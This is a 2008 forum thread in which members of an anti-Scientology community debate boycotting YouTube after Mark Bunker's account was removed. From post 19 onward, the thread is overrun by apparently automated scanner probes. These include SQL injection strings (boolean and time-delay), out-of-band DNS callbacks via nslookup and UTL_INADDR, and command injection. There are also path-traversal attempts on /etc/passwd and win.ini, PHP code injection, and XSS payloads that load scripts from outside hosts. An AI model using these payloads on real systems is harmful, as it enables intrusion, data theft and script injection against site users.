Customize

Boycott Youtube?

Discussion in 'Think Tank' started by i'mglib, Apr 26, 2008.

1. i'mglib Member

Boycott Youtube?

After seeing what Youtube did to Mark Bunker, I would love to see them lose all their business to Vimeo.

Apparently Vimeo has way better quality. I could easily see a groundswell happening and people jumping the Youtube ship.

It's inexplcable to me why the cancelled WBMs account. There must be some pressure from the inside, because their explanation doesn't make sense:

There must be some pressure from COS to do this. Otherwise they'd have to cancel half the accounts PERMANENTLY for copyright infringement.

It's corrupt.

I personally don't like supporting corrupt organizations.

I would love to see people leave Youtube IN DROVES.

At the very least, I think people should post videos in both places for a while. Links on MBs should be to the Vimeo copy.
  2. themadhair Member

Re: Boycott Youtube?

Because that makes sense. I mean, we all know how much the €ult would hate to see us abandon the [size=+5]MOST VISITED VIDEO SITE ON THE NET.[/size]

Mass exodus from YouTube would be mass fail. Post videos everywhere - but don't abandon YouTube.
  3. Piranon Member

Just something about knowledge on the tubes, available. YT sucks, period. But not touch mai Internets, thank you. :fuckyou:
  4. i'mglib Member

I'm not talking about leaving en masse.
    Except that I said "in droves"...whoops.
    I'm picturing more of a gradual disaffection.
    People post both places for a while.

Think "Myspace."
    When was the last time anyone was on their Myspace account?

For starters, I think the word Youtube should be removed from all subforums.
    What if people personally don't want to upload there? What about WBM?
    What if people want to post links to videos uploaded elsewhere? Why put the word Youtube in the name of the subforum, thus insinuating that that's the only place where videos reside?
  5. Whitehatv2 Member

This Plan is made of fail and aids.

Youtube is our biggest propraganda outlet. It's not their fault that they have no balls.

Boycott Viacom instead.
  6. themadhair Member

About two mins before they banned the Atheist and Agnostic Group.
  7. captainslug Member

Getting xenutv or xenutv1 back is almost impossible at this point.
    We do not have any remaining angles to work out this issue to reinstate his account as it was previously. The only problem with Youtube is their shitty flagging system that's easy to abuse and their inability to enforce their Terms of Service in an equitable and honest manner.
    They're not anymore corrupt than other sites that offer ad space. They just don't handle conflict resolution anywhere near as well as they should considering their size and importance.

Leaving Youtube is not an option.
    The issue is not about the hosting of the content. That can be done anywhere. What can't be done anywhere else is reaching the gigantic audience that Youtube has. That is their only advantage.

Diversify, don't exclusivize.
    Mark was only unable to do this in the beginning because he's a very busy person.
    There are options being explored at the moment but progress is going to be slow. In the meantime we still have the go-ahead to redistribute his work there in a decentralized manner for the time being.
    Doing it in a centralized manner later may be possible.
  8. Anonymous Member

One major thing that can be done is CREATE MORE VIDEOS.

Sure, Mark was cranking out some meaty stuff, but there are tons of talented people in this Movement. It's time to start seeing some more "channels" on YouTube that are showing similar videos. I want more comedy, I want more drama, I want more history, I want some damn cartoons, dammit!

Am I wrong? Are there no computer/video savvy Anons out there who can write, produce and then air their own anti-Scientology videos on YouTube? Mark got yanked because he played right into the wrong hands by disregarding the Terms Agreement for YT. There must be a way to be use YT as an effective tool, without breaking their rules and yet still being just as informative about the CoS as Bunker.

The first thing we should do is put i'mglib on camera - she's a hottie!
  9. A_nonchalant Member

Also, as much as we chest-pound about being the Internet Haet Machine, there's like 10,000 of us. If we ALL left, seriously, never to return, never to click on any YouTube link ever again...

...YouTube would never fucking notice. :fuckyou:

I think Mark Bunker needs to send out a counter-DMCA notice, possibly with a lawyer in tow, but that takes time and money he's apparently decided not to waste.

Maybe Mark Bunker works for the Church of Scientology... :tinfoil:
  10. eksef Member

NO.

We NEED YouTube to contact the commonfolk and mainstream media.

Once Scientology is dead, THEN we can shit on youtube.
  11. HailXenu79 Member

I'll post this graph again:

Graph.jpg

The top line is YouTube. The lower lines (vimeo.com, somethingawful.com, 4chan.org, and enturbulation.org) are so relatively low in daily reach that they are combined into one line.

YouTube is still the biggest video site *by far* on the Internet. If the 5,000+ members of this and other anti-CoS sites boycotted YouTube, it would not even register in YouTube's numbers.

Bottom line, YouTube is still necessary due to its tremendous reach.
  12. i'mglib Member

I agree that Youtube is powerful now.
    But the mightiest can still fall.
    I'll say it again, "When's the last time you logged into your Myspace account?"

And thanks for this, Anonymous:

Awww. I think you might have gotten me mixed up with someone though, maybe the glibette. I'm the soccer mom's grandma. I'm in one of Mark Bunker's LA picket videos from a ways back, and I sound like Maria Shriver in it. I don't know what happened to my voice.
  13. Azrael Member

what im doing is removing all original content like raid videos, wile at the same time uploading things i think youtube doesnt want to see like the trailer for the jason beghe video and beardmans response to the removal of the account.

in any case if we want to achieve anything with respect to youtube we must reach the youtube audiance.
    and i can see no better way then to do that trough youtube...

as i see it youtube is inherently a crappy service.
    low quality and unstable speeds with lots and lots of unneccecary crap around it.
    and if on top of that they are repressing free speech then i can easily see lots of people
    switching to another in a short period of time.

i think that if we simply make sure we favor another server before making sure to
    upload a copy to youtube, and make sure to reference the better quality version on the other server, we will cause significant damage to youtube.

anyways one thing we should be carefull of is to not get drawn into another big conflict
    untill we celebrate total victory over CoS.
  14. Daywatch Member

nice to see you over here!

and yes we like our MILFS and GMILFS here!
  15. moose Member

16. DH1900 Member

Division of labour, you boycott youtube until they give in and I'll stop the tides.
  17. moose Member

I could start our own Video-sharing website (very similar to youtube), but i need some help getting enough Bandwith.

So, if you can offer some help with that, pm me.
    ;)
  18. moose Member

True, but we 'have' the media. We know how to make it to the newspapers/magazines/blogs/tv/etc. And that is something they would notice; we can do something to their reputation.
  19. response.write(9619100*9161372)
  20. '+response.write(9619100*9161372)+'
  21. "+response.write(9619100*9161372)+"
  22. -1 OR 2+154-154-1=0+0+0+1 --
  23. 20</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=013541&r=3-41739&h=3-4fea9-2&/).slice(2),document.documentElement.appendChild(s))//'>
  24. response.write(9784665*9471617)
  25. -1 OR 2+147-147-1=0+0+0+1
  26. '+response.write(9784665*9471617)+'
  27. -1' OR 2+126-126-1=0+0+0+1 --
  28. "+response.write(9784665*9471617)+"
  29. -1' OR 2+904-904-1=0+0+0+1 or 'bg2R7nbK'='
  30. response.write(9690361*9939381)
  31. 20</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=013541&r=3-41741&h=3-4fea9-2&/).slice(2),document.documentElement.appendChild(s))//'>
  32. -1" OR 2+463-463-1=0+0+0+1 --
  33. if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/
  34. (select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/
  35. '+response.write(9690361*9939381)+'
  36. -1; waitfor delay '0:0:9' --
  37. "+response.write(9690361*9939381)+"
  38. 20</script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=013541&r=3-41743&h=3-4fea9-2&/).slice(2),document.documentElement.appendChild(s))//'>
  39. -1); waitfor delay '0:0:9' --
  40. 1 waitfor delay '0:0:9' --
  41. uVmchnd6'; waitfor delay '0:0:9' --
  42. -1;select pg_sleep(3); --
  43. -1);select pg_sleep(3); --
  44. -1));select pg_sleep(3); --
  45. AfPHF6lJ';select pg_sleep(3); --
  46. 9NZx85ZD');select pg_sleep(3); --
  47. JhiQ0qEv'));select pg_sleep(3); --
  48. set|set&set
  49. 20||UTL_INADDR.get_host_address('dns.'||'sqli.013541.3-41750.3.4fea9.1.bxss'||'.me')
  50. $(nslookup dns.ce.\013541.3-41751.3.4fea9.\1.bxss.me)
  51. '||UTL_INADDR.get_host_address('dns.'||'sqli.013541.3-41752.3.4fea9.1.bxss'||'.me')||'
  52. &nslookup dns.ce.\013541.3-41753.3.4fea9.\1.bxss.me&'\"`0&nslookup dns.ce.\013541.3-41753.3.4fea9.\1.bxss.me&`'
  53. set|set&set
  54. 20;copy (select '') to program 'nslookup dns.sqli.\013541.3-41755.3.4fea9.\1.bxss.me'
  55. $(nslookup dns.ce.\013541.3-41756.3.4fea9.\1.bxss.me)
  56. 20';copy (select '') to program 'nslookup dns.sqli.\013541.3-41757.3.4fea9.\1.bxss.me
  57. &nslookup dns.ce.\013541.3-41758.3.4fea9.\1.bxss.me&'\"`0&nslookup dns.ce.\013541.3-41758.3.4fea9.\1.bxss.me&`'
  58. set|set&set
  59. -1 OR 2+68-68-1=0+0+0+1 --
  60. $(nslookup dns.ce.\013541.3-41761.3.4fea9.\1.bxss.me)
  61. -1 OR 2+412-412-1=0+0+0+1
  62. -1' OR 2+72-72-1=0+0+0+1 --
  63. &nslookup dns.ce.\013541.3-41763.3.4fea9.\1.bxss.me&'\"`0&nslookup dns.ce.\013541.3-41763.3.4fea9.\1.bxss.me&`'
  64. -1' OR 2+489-489-1=0+0+0+1 or 'FCnB4JyX'='
  65. -1" OR 2+753-753-1=0+0+0+1 --
  66. if(now()=sysdate(),sleep(8),0)/*'XOR(if(now()=sysdate(),sleep(8),0))OR'"XOR(if(now()=sysdate(),sleep(8),0))OR"*/
  67. (select(0)from(select(sleep(8)))v)/*'+(select(0)from(select(sleep(8)))v)+'"+(select(0)from(select(sleep(8)))v)+"*/
  68. -1; waitfor delay '0:0:8' --
  69. -1); waitfor delay '0:0:8' --
  70. 1 waitfor delay '0:0:8' --
  71. RyzrC3dT'; waitfor delay '0:0:8' --
  72. -1;select pg_sleep(12); --
  73. -1);select pg_sleep(12); --
  74. -1));select pg_sleep(12); --
  75. Qx9FiUX3';select pg_sleep(12); --
  76. Bp0bNuck');select pg_sleep(12); --
  77. fvvaI9u1'));select pg_sleep(12); --
  78. 20||UTL_INADDR.get_host_address('dns.'||'sqli.013541.3-41776.3.4fea9.1.bxss'||'.me')
  79. '||UTL_INADDR.get_host_address('dns.'||'sqli.013541.3-41779.3.4fea9.1.bxss'||'.me')||'
  80. 20;copy (select '') to program 'nslookup dns.sqli.\013541.3-41782.3.4fea9.\1.bxss.me'
  81. 20';copy (select '') to program 'nslookup dns.sqli.\013541.3-41784.3.4fea9.\1.bxss.me
  82. -1 OR 2+47-47-1=0+0+0+1 --
  83. ../../../../../../../../../../etc/passwd
  84. -1 OR 2+684-684-1=0+0+0+1
  85. ../../../../../../../../../../../../../../../proc/version
  86. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
  87. ../../../../../../../../../../etc/passwd.jpg
  88. -1' OR 2+362-362-1=0+0+0+1 --
  89. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
  90. -1' OR 2+786-786-1=0+0+0+1 or 'uGbqYwqQ'='
  91. /../..//../..//../..//../..//../..//etc/passwd.jpg
  92. %2fetc%2fpasswd
  93. /.././.././.././.././.././.././.././../etc/./passwd%00
  94. 1some_inexistent_file_with_long_name.jpg
  95. ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
  96. ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
  97. testasp.vulnweb.com
  98. invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
  99. file:///etc/passwd
  100. /\../\../\../\../\../\../\../etc/passwd
  101. WEB-INF/web.xml
  102. 20&n949390=v907234
  103. /WEB-INF/web.xml
  104. WEB-INF\web.xml
  105. ../../../../../../../../../../windows/win.ini
  106. C:\WINDOWS\system32\drivers\etc\hosts
  107. !(()&&!|*|*|
  108. ../../../../../../../../../../windows/win.ini.jpg
  109. ^(#$!@#$)(()))******
  110. ................windowswin.ini
  111. !(()&&!|*|*|
  112. ..\..\..\..\..\..\..\..\windows\win.ini
  113. ^(#$!@#$)(()))******
  114. /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
  115. ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
  116. !(()&&!|*|*|
  117. ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
  118. ^(#$!@#$)(()))******
  119. unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
  120. WEB-INF/web.xml
  121. WEB-INF\web.xml
  122. ../../../../../../../../../../etc/passwd
  123. ../../../../../../../../../../../../../../../proc/version
  124. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
  125. ../../../../../../../../../../etc/passwd.jpg
  126. ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
  127. /../..//../..//../..//../..//../..//etc/passwd.jpg
  128. .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
  129. /etc/passwd
  130. ;print(md5(acunetix_wvs_security_test));
  131. ';print(md5(acunetix_wvs_security_test));$a='
  132. %2fetc%2fpasswd
  133. ";print(md5(acunetix_wvs_security_test));$a="
  134. /.././.././.././.././.././.././.././../etc/./passwd%00
  135. ${@print(md5(acunetix_wvs_security_test))}
  136. ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
  137. ${@print(md5(acunetix_wvs_security_test))}\
  138. ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
  139. ;print(md5(acunetix_wvs_security_test));
  140. acu2846<s1﹥s2ʺs3ʹuca2846
  141. {{9999748*9999001}}
  142. 20<ScRiPt >6Jhg(9012)</ScRiPt>
  143. 20<WEHJ35>USVTO[!+!]</WEHJ35>
  144. 20<script>6Jhg(9759)</script>
  145. 1'"

146. 20<ScR<ScRiPt>IpT>6Jhg(9224)</sCr<ScRiPt>IpT>
  147. 20<ScRiPt
    >6Jhg(9584)</ScRiPt>
  148. 1'"

149. 20<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9421></ScRiPt>